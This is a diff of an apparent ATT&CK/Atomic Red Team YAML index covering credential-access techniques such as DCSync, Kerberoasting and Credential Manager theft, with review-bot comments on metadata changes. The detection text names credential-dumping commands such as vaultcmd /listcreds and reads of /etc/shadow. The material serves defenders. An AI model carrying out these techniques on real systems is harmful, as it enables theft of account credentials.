to store user account information including password hashes in /etc/shadow
. By default, /etc/shadow
is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -57236,20 +57946,42 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
distributions, can be used to watch for hostile processes attempting to access
/etc/passwd
and /etc/shadow
, alerting on the pid,
process name, and arguments of such programs.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+ created: '2020-02-11T18:46:56.263Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/008
+ external_id: T1003.008
+ - source_name: Linux Password and Shadow File Formats
+ description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+ File Formats. Retrieved February 19, 2020.
+ url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+ - source_name: nixCraft - John the Ripper
+ description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+ unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+ 2020.'
+ url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.008
atomic_tests:
- name: Access /etc/shadow (Local)
@@ -57383,7 +58115,7 @@ credential-access:
from Memory. Retrieved October 11, 2019.
url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
source_name: Medium Detecting Attempts to Steal Passwords from Memory
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T21:46:46.831Z'
name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
description: |-
Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
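Review bot: the `modified` date for T1558.002 regresses from '2021-04-29T14:49:39.188Z' to '2020-03-25T21:46:46.831Z'. As with T1557.002 earlier in the patch, this looks like the object was pulled from an older source bundle than the techniques around it; please confirm the intended source before merging.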
@@ -57409,13 +58141,11 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.002
atomic_tests: []
T1555.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:44:35.906Z'
name: 'Credentials from Password Stores: Windows Credential Manager'
description: |-
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
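Review bot: T1558.002 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` here, and unlike every other technique in this patch no `x_mitre_attack_spec_version: 3.2.0` is added elsewhere in the object within this diff. If the field is required for this index, the Silver Ticket entry ends up without one; if the object simply was not refreshed from upstream, it should be left untouched rather than half-updated.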
@@ -57432,24 +58162,24 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Bernaldo Penas Antelo
+ - Mugdha Peter Bansode
+ - Uriel Kosayev
+ - Vadim Khrykov
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor process and command-line parameters of vaultcmd.exe
for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”
).(Citation: Malwarebytes The Windows Vault)
Consider monitoring API calls such as CredEnumerateA
that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Consider monitoring file reads to Vault locations, %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\
, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Bernaldo Penas Antelo
- - Mugdha Peter Bansode
- - Uriel Kosayev
- - Vadim Khrykov
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -57490,36 +58220,13 @@ credential-access:
url: https://www.passcape.com/windows_password_recovery_vault_explorer
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.004
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -57540,6 +58247,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -57554,52 +58262,42 @@ credential-access:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
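Review bot: this hunk interleaves the T1556.001 and T1556.005 objects because the key order changed (platforms, domains, id and external_references moved from the top of each object to the bottom), which hides the real content changes: the `x_mitre_permissions_required` removals for both techniques and the `x_mitre_version` bumps to '2.1' and '1.1'. Consider having the generator emit keys in a fixed order, or splitting the reorder from the content update, so future diffs of this index stay reviewable.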
@@ -57621,6 +58319,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -57631,23 +58330,50 @@ credential-access:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1111:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:37:20.612Z'
name: Multi-Factor Authentication Interception
description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
(i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -57718,9 +58444,8 @@ credential-access:
url: https://sec.okta.com/scatterswine
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.003:
technique:
@@ -57779,12 +58504,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.003
atomic_tests: []
T1558.003:
technique:
- modified: '2023-03-30T21:01:46.538Z'
+ modified: '2024-09-23T22:20:10.994Z'
name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
(TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
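Review bot: T1003.003 keeps `x_mitre_attack_spec_version: 3.1.0` and only loses `spec_version`, while T1187 and T1111 in the same patch are bumped from 3.1.0 to 3.2.0. If 3.1.0 is what upstream still carries for NTDS this is fine; otherwise this entry was missed by whatever refreshed the others and should be regenerated alongside them.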
@@ -57816,6 +58540,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -57825,7 +58550,6 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -57837,111 +58561,49 @@ credential-access:
id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
created: '2020-02-11T18:43:38.588Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1558/003
external_id: T1558.003
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- source_name: Empire InvokeKerberoast Oct 2016
description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
March 22, 2018.
url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
Domain. Retrieved March 22, 2018.
url: https://adsecurity.org/?p=2293
- - source_name: Microsoft Detecting Kerberoasting Feb 2018
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Microsoft SPN
- description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
- 2018.
- url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Microsoft SetSPN
description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
Syntax (Setspn.exe). Retrieved March 22, 2018.
url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
- - source_name: SANS Attacking Kerberos Nov 2014
- description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- url: https://redsiege.com/kerberoast-slides
+ - source_name: Microsoft SPN
+ description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+ 2018.
+ url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Harmj0y Kerberoast Nov 2016
description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
- Retrieved March 23, 2018.
- url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+ Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.003
atomic_tests: []
T1003.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ExtraHop
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
- type: attack-pattern
- created: '2020-02-11T18:45:34.293Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.006
- url: https://attack.mitre.org/techniques/T1003/006
- - url: https://msdn.microsoft.com/library/cc228086.aspx
- description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
- Service (DRS) Remote Protocol. Retrieved December 4, 2017.
- source_name: Microsoft DRSR Dec 2017
- - url: https://msdn.microsoft.com/library/dd207691.aspx
- description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
- 4, 2017.
- source_name: Microsoft GetNCCChanges
- - url: https://wiki.samba.org/index.php/DRSUAPI
- description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
- source_name: Samba DRSUAPI
- - url: https://source.winehq.org/WineAPI/samlib.html
- description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
- source_name: Wine API samlib.dll
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved August 7, 2017.
- source_name: ADSecurity Mimikatz DCSync
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved August 7, 2017.
- source_name: Harmj0y Mimikatz and DCSync
- - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
- description: Warren, J. (2017, July 11). Manipulating User Passwords with
- Mimikatz. Retrieved December 4, 2017.
- source_name: InsiderThreat ChangeNTLM July 2017
- - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
- description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
- August 7, 2017.
- source_name: GitHub Mimikatz lsadump Module
- - url: https://msdn.microsoft.com/library/cc237008.aspx
- description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
- Retrieved December 6, 2017.
- source_name: Microsoft NRPC Dec 2017
- - url: https://msdn.microsoft.com/library/cc245496.aspx
- description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
- Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
- source_name: Microsoft SAMR
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved December 4, 2017.
- source_name: AdSecurity DCSync Sept 2015
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved December 4, 2017.
- source_name: Harmj0y DCSync Sept 2015
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:54:08.312Z'
name: 'OS Credential Dumping: DCSync'
description: |-
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
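Review bot: `spec_version: '2.1'` is removed from T1558.003 (the `- spec_version: '2.1'` line right after `object_marking_refs`) with nothing put in its place, and the same removal recurs on almost every object in this patch. `spec_version` is a required common property on STIX 2.1 objects, so if anything downstream validates or round-trips these technique blocks as STIX, they will stop validating; if the generator now strips it deliberately, the commit message should say so. The reference edits in the same hunk look right: `Harmj0y Kerberoast Nov 2016` moves from `https://www.harmj0y.net/blog/powershell/...` to `https://blog.harmj0y.net/powershell/...` with the retrieval date updated to September 23, 2024, and the other entries are only reordered, not changed.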
@@ -57952,26 +58614,88 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - ExtraHop
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+ created: '2020-02-11T18:45:34.293Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/006
+ external_id: T1003.006
+ - source_name: GitHub Mimikatz lsadump Module
+ description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+ August 7, 2017.
+ url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+ - source_name: ADSecurity Mimikatz DCSync
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved August 7, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: AdSecurity DCSync Sept 2015
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved December 4, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: Microsoft DRSR Dec 2017
+ description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+ Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc228086.aspx
+ - source_name: Microsoft NRPC Dec 2017
+ description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+ Retrieved December 6, 2017.
+ url: https://msdn.microsoft.com/library/cc237008.aspx
+ - source_name: Microsoft GetNCCChanges
+ description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+ 4, 2017.
+ url: https://msdn.microsoft.com/library/dd207691.aspx
+ - source_name: Microsoft SAMR
+ description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+ Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc245496.aspx
+ - source_name: Samba DRSUAPI
+ description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+ url: https://wiki.samba.org/index.php/DRSUAPI
+ - source_name: Harmj0y DCSync Sept 2015
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved December 4, 2017.
+ url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: Harmj0y Mimikatz and DCSync
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: InsiderThreat ChangeNTLM July 2017
+ description: Warren, J. (2017, July 11). Manipulating User Passwords with
+ Mimikatz. Retrieved December 4, 2017.
+ url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+ - source_name: Wine API samlib.dll
+ description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+ url: https://source.winehq.org/WineAPI/samlib.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.006
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
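Review bot: the refreshed harmj0y link in T1003.006's `external_references` lands on only one of two duplicate entries. `Harmj0y Mimikatz and DCSync` now points at `https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/` (retrieved September 23, 2024), while `Harmj0y DCSync Sept 2015`, the name actually used by `(Citation: Harmj0y DCSync Sept 2015)` in `x_mitre_detection`, keeps the old `http://www.harmj0y.net/blog/redteaming/...` URL. In the same list `ADSecurity Mimikatz DCSync` and `AdSecurity DCSync Sept 2015` both resolve to `https://adsecurity.org/?p=1729`. Since these blocks mirror upstream ATT&CK data, the duplication is an upstream issue rather than something to hand-patch here, but it is worth recording so the stale http URL is not later reported as a regression of this change.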
@@ -57984,6 +58708,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -58020,17 +58745,17 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
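Review bot: the platform rename in T1556 (`- Azure AD`, `- Google Workspace`, `- Office 365` removed; `+ Office Suite`, `+ Identity Provider` added; `x_mitre_version` '2.4' to '2.5') will silently drop this technique from anything that filters on the old platform strings. The same rename is applied to T1069 and T1069.003 further down in this patch, so every consumer that keys on `x_mitre_platforms` values, including any per-platform index generation, needs to be checked for the new names before merge; a missed consumer produces no error, the technique just disappears from that view.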
@@ -58076,81 +58801,10 @@ credential-access:
